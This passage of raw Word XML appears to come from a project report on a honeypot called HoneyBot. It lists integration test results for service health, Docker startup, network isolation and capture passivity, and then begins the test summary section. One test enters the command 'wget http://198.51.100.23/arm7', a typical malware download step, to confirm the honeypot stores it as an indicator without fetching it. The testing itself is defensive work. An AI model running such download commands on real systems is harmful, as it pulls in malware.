            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">curl -u admin:… http://localhost/ and /api/health</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Basic auth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200 for both</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">page: 200 (0.034 s); api: 200 (0.150 s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-INT-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Docker Compose — all services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify all services start and the database is healthy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose up -d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose up -d; docker compose ps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">11 services up, db healthy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">All 11 containers Started; honeybot_db Healthy (after removing an old PostgreSQL 15 volume)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-INT-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Network isolation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify the API and database are not reachable from the host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Windows deployment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Only port 80 and honeypot ports published</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">docker-compose.yml</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">No 5000/5432/6379 on host</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Only 80, 554, 1883, 2222, 2323, 8080–8082, 8443 published</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w:rsidRPr="005C6601" w14:paraId="466DC6E6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:trPr>
          <w:trHeight w:val="877"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="641" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">HB-INT-009</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="974" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Shell → IOC store (passivity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1466" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Verify captured URLs are never fetched</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1396" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Logged in over SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">wget http://198.51.100.23/arm7; check iocs and network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1114" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Download command</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1513" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">IOC stored, no outbound request</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">url and ipv4 IOCs stored; no connection to 198.51.100.23</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="758" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4572000" cy="1307969"/>
            <wp:docPr id="42" name="Picture 42"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="term_events.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1307969"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CF3682" w14:textId="7FA23AD5" w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">39</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Unified Event Store after the Simulator Run — Events per Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9051" w:name="_Toc69051"/>
      <w:r>
        <w:t xml:space="preserve">8.5 Test Summary and Security Analysis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9051"/>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">31</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Test Summary (70% build)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="1170"/>
        <w:gridCol w:w="4954"/>
        <w:gridCol w:w="1584"/>
      </w:tblGrid>
      <w:tr w:rsidR="003272AD" w:rsidRPr="00C251B1" w14:paraId="0AB1456F" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Test group</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1170" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Test cases</w:t>
